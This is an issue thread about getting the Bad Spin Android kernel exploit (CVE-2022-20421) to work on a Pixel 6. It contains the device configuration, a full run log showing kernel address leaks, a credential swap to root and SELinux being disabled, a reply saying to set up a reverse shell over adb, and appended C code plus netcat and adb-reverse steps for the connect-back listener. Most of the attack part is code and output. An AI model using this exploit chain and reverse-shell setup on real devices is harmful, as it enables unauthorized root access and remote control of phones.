Google Pixel 6 not working, stuck on "Could not open socket connection"
KingDiamondDev opened this issue · 1 comment
dev_config.h:
```c
.name = "Google Pixel 6",
.model = "Pixel 6",
.android_version = 12,
.android_security_patch.year = 2022,
.android_security_patch.month = 7,
.kernel_version = KERNEL_VERSION(5, 10, 81),
.kimg_to_lm = pixel_kimg_to_lm,
.find_kbase = noop_kbase,
```
Log from terminal:
```text
- daemon not running; starting now at tcp:5037
- daemon started successfully
oriole:/ $ LD_PRELOAD=/data/local/tmp/libbadspin.so sleep 1
==========================================
Bad Spin Exploit (CVE-2022-20421) by 0xkol
==========================================
[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[x] Trigger use-after-free
[x] Finish spinning at spin_lock()
[x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)
[x] Shaping physical memory
[x] Trigger vulnerability... (mode = 3)
[x] Trigger use-after-free
[x] Waiting for timer threads
[x] Finish spinning at spin_lock()
.............................................*....
[x] Trying to escalate...
[x] Found corrupted ptmx and pipe.
[x] Leaking pipe buffer...
[x] Leaked pipe buffer oprerations: ffffffe371f3d9a8
[x] Leaked pipe buffer page : ffffffff01540080
[x] kallsyms found successfully!
[x] Kernel base: ffffffe36fc00000
[x] Found init_task: ffffffe3725cbec0
[x] task_struct offsets:
tasks at 1224
pid at 1480
tgid at 1484
thread_group at 1656
files at 1984
cred at 1920
[x] files_struct offsets:
fdt at 32
[x] task_struct: ffffff8863570000
[x] Successfully upgraded to stable RW primitives. \o/
[x] Success! Time to root
Finding init cred
init task_struct = ffffff880017b780
init cred = ffffff8825c3dc00 (usage 5)
Switch 11045:-1 to new creds (ffffff8825c3dc00)
task_struct (11045:-1) = ffffff8863575c80 cred = ffffff880910d0c0
Change cred and real_cred
Done
Setting selinux_state->enforce to 0
status page = ffffffff20209dc0
status page virt = ffffff8810277000
Done
Switch 10030:10030 to new creds (ffffff8825c3dc00)
task_struct (10030:10030) = ffffff8893699280 cred = ffffff880665d3c0
Change cred and real_cred
Done
Switch 10030:10030 to new creds (ffffff880665d3c0)
task_struct (10030:10030) = ffffff8893699280 cred = ffffff8825c3dc00
Change cred and real_cred
Done
Setting selinux_state->enforce to 1
status page = ffffffff20209dc0
status page virt = ffffff8810277000
Done
Switch 10030:10030 to new creds (ffffff8825c3dc00)
task_struct (10030:10030) = ffffff8893699280 cred = ffffff880665d3c0
Change cred and real_cred
Done
escalate exit status = 0
Reset process state
Could not open socket connection
```
It just hangs at the end. I've checked the other issues (opened and closed) but I don't believe I saw anything like this in there. Am I doing something wrong?
You need to set up a reverse shell in adb
See the demo video in this lecture (near the end)
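An added example, not code from badspin or from this issue thread: the two halves of the connect-back socket setup that the final step relies on, run on one machine so both outcomes can be observed. It assumes (this is not stated on the page) that the exploit's last step connects to a loopback TCP port on the device which `adb reverse tcp:PORT tcp:PORT` maps to a listener on the host; the port (chosen by the kernel here), the banner string and the function names are illustrative. The first function shows the exchange with a listener present; the second reproduces the no-listener case, which is the situation the reply's "set up a reverse shell" advice addresses.

```c
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Host side of the pair: a listener on 127.0.0.1. Passing *port_out == 0 lets
 * the kernel choose a free port, which is written back for the caller.
 * Returns the listening fd, or -1 on failure. */
static int open_listener(unsigned short *port_out)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    int one = 1;
    setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);

    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(*port_out);
    socklen_t len = sizeof sa;
    if (bind(fd, (struct sockaddr *)&sa, len) < 0 || listen(fd, 1) < 0 ||
        getsockname(fd, (struct sockaddr *)&sa, &len) < 0) {
        close(fd);
        return -1;
    }
    *port_out = ntohs(sa.sin_port);
    return fd;
}

/* Device side: the connect-back. On the phone this would target the port that
 * `adb reverse` forwards to the host (assumed design, see lead-in). Returns the
 * connected fd, or -1 with errno preserved when nothing is listening. */
static int connect_back(unsigned short port)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(port);
    if (connect(fd, (struct sockaddr *)&sa, sizeof sa) < 0) {
        int saved = errno;
        close(fd);
        errno = saved;
        return -1;
    }
    return fd;
}

/* Full exchange with the listener in place: the connected side sends a
 * constructed banner and the listener reads it back. Returns 1 on success. */
int connect_back_with_listener(void)
{
    static const char banner[] = "uid=0(root) gid=0(root)\n"; /* constructed sample */
    unsigned short port = 0;
    int lfd = open_listener(&port);
    if (lfd < 0)
        return 0;
    int cfd = connect_back(port);
    if (cfd < 0) {
        close(lfd);
        return 0;
    }
    int afd = accept(lfd, NULL, NULL);
    int ok = 0;
    if (afd >= 0) {
        char buf[64];
        ssize_t want = (ssize_t)strlen(banner);
        if (write(cfd, banner, (size_t)want) == want) {
            ssize_t got = read(afd, buf, sizeof buf);
            ok = got == want && memcmp(buf, banner, (size_t)want) == 0;
        }
        close(afd);
    }
    close(cfd);
    close(lfd);
    return ok;
}

/* The failure mode behind "Could not open socket connection": reserve a free
 * port, release it so nothing listens, then attempt the connect-back. Returns 1
 * when connect() fails with ECONNREFUSED, i.e. no listener on the far side. */
int connect_back_without_listener(void)
{
    unsigned short port = 0;
    int lfd = open_listener(&port);
    if (lfd < 0)
        return 0;
    close(lfd);
    int fd = connect_back(port);
    if (fd >= 0) {
        close(fd);
        return 0;
    }
    return errno == ECONNREFUSED;
}

int main(void)
{
    printf("with listener: %s\n", connect_back_with_listener() ? "banner received" : "failed");
    printf("without listener: %s\n", connect_back_without_listener() ? "ECONNREFUSED" : "unexpected");
    return 0;
}
```

On a real run the host side is the part the reporter was missing: forward the port with `adb reverse tcp:PORT tcp:PORT` (PORT being whatever the exploit build expects, an assumption here) and start a listener such as netcat on that port before launching the exploit, so that the device-side connect finds something to talk to instead of being refused.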